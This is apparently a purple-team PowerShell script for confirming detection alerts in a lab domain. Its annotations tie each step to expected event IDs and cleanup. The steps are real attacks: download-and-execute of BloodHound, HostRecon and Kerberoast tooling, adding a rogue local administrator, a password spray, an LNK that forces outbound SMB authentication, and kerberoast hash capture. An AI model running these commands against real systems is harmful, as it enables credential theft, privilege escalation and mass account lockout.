# Attacks-Some
# Detection-validation script for a lab SOC: each section below performs one noisy action on a
# domain-joined host so the matching alert can be confirmed. The sections are independent and are
# presumably meant to be pasted one at a time (BloodHound is fetched twice, once as a script and
# once as a zip), not run top-to-bottom. Every line has side effects on the host, the domain or
# the network, and several leave artefacts on disk that need cleaning up afterwards.
#
# PowerShell invoke-expression of BloodHound
# First tho, enable TLS1.2 for PowerShell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Download-and-IEX: the script text is executed from memory, never saved, so file-based controls
# will not see it. The expected telemetry is PowerShell Script Block Logging (EID 4104) /
# Module Logging, plus the outbound HTTPS request to raw.githubusercontent.com.
IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
Invoke-BloodHound
# This time, copy the BloodHound containers down
# First tho, disable PowerShell's progress bar, which causes ridiculously slow downloads
# Then, enable TLS1.2 for PowerShell
$ProgressPreference = 'SilentlyContinue'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# NOTE(review): the dash before URI on the next line is an en-dash (U+2013), not '-', so
# PowerShell will not bind it as the -URI parameter; looks like a copy/paste artefact -- confirm
# against the original file.
# Unlike the section above, this variant writes master.zip and the extracted SharpHound.ps1 to
# disk, so the on-disk copy is an extra artefact (and an extra detection opportunity).
Invoke-WebRequest –URI https://github.com/BloodHoundAD/BloodHound/archive/master.zip -OutFile "master.zip"
Expand-Archive master.zip
Import-Module .\master\BloodHound-master\Collectors\SharpHound.ps1
Invoke-BloodHound
# Let's run a few commands to check on detections for:
# 1. user additions
# 2. maybe privileged group modifications -- should be EID 4799?
# NOTE(review): 4799 is "security-enabled local group membership was enumerated"; a member being
# added to a local group is logged as 4732 (4728 for a global group), and the account creation
# itself as 4720 -- confirm which IDs the SIEM rule keys on before declaring a miss.
# Both commands run net1.exe rather than net.exe; a rule that matches only the net.exe image will
# not fire on these, so the rule should cover both binaries.
# The test account and its password are hard-coded in clear text; delete the account once done.
net1 user bhissoctest Soctest12! /add
net1 localgroup administrators bhissoctest /add
# Check on current domain
# Read-only: returns the Domain object for the host's current domain, no change is made.
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Run local host recon script
# As always, make sure PowerShell supports TLS traffic
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Same download-and-IEX pattern as the BloodHound section; the same telemetry applies.
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/HostRecon/master/HostRecon.ps1')
# Output lands in recon.txt in the current directory -- an artefact to remove after the test.
Invoke-HostRecon |Out-File recon.txt
# Password spray against all users!
# Gather archives first
# A spray shows up as a burst of failed logons across many accounts from a single source; that
# one-source/many-accounts spread is the detection signal (4625 on the member, 4771 or 4776 on the
# DC depending on which auth path the tool takes -- confirm in the lab). Against a production
# domain this can trip account lockout for every user at once.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -URI "https://github.com/dafthack/DomainPasswordSpray/archive/master.zip" -OutFile "~\Downloads\master.zip"
# Expand DPS .zip file
cd ~\Downloads\
Expand-Archive "master.zip"
# cd to the correct directory and execute the attack
cd ~\Downloads\master\DomainPasswordSpray-master
# No -Scope, so the execution policy is changed persistently (default scope is LocalMachine,
# presumably needing admin) and is never restored; the policy change is itself auditable and
# should be reverted after the exercise.
Set-ExecutionPolicy Bypass -Force
Import-Module .\DomainPasswordSpray.ps1
# The sprayed password is hard-coded; -Force presumably skips the tool's confirmation prompt.
Invoke-DomainPasswordSpray -Password Winter2020! -Force
# Create a malicious LNK file
# Triggers here might be sysmon event ID 11 (file create boolean on .lnk)
# Or, suspicious wscript execution
# NOTE(review): WScript.Shell is instantiated as a COM object inside powershell.exe; wscript.exe
# itself is not launched here, so a rule keyed on a wscript.exe process-create will not fire --
# confirm whether the "wscript" rule looks at the process image or at the COM/DLL load.
$objShell = New-Object -ComObject WScript.Shell
# Dropped into the Public profile, so any user browsing that folder is exposed to it.
$lnk = $objShell.CreateShortcut("C:\users\Public\Malicious.lnk")
# UNC target on 10.10.98.20: resolving the shortcut is presumably what makes the client connect
# out over SMB to that host -- the "silent auth" the Description refers to. Network-side, the
# signal is outbound SMB from a workstation to an address that is not a known file server.
$lnk.TargetPath = "\\10.10.98.20\@threat.png"
$lnk.WindowStyle = 1
# The icon is a local DLL, so the icon path itself is not what drives the outbound connection.
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing the desktop should trigger silent auth."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
# Add an SPN to an account
# Domain may need to change here
# This is kerberoasting
# Registering an SPN on the built-in administrator makes that account a roasting target; the SPN
# write is an AD object modification (5136 if directory-service change auditing is enabled --
# confirm) and the SPN should be removed again after the test.
setspn -a ws01/administrator.labs.local:1433 labs.local\administrator
# -Q */* enumerates every SPN in the forest: read-only, but a broad LDAP query from a workstation.
setspn -T labs.local -Q */*
# Same persistent policy change as in the spray section (cmdlet names are case-insensitive).
set-ExecutionPolicy bypass -Force
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# NOTE(review): the opening quote on the next line, and both quotes around the output path two
# lines down, are curly quotes (U+2018/U+2019) rather than '. Recent PowerShell versions treat
# smart quotes as string delimiters so this may still parse -- confirm on the target version.
IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
# Requests a service ticket for every SPN account in one pass: on the DC this is a burst of 4769
# events from one client, typically with RC4 (etype 0x17) tickets -- the usual kerberoast
# detection. -erroraction silentlycontinue hides any failures. The hashes are written in clear
# under C:\users\public and must be deleted once the detection has been confirmed.
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath ‘c:\users\public\HashCapture.txt’ -Width 8000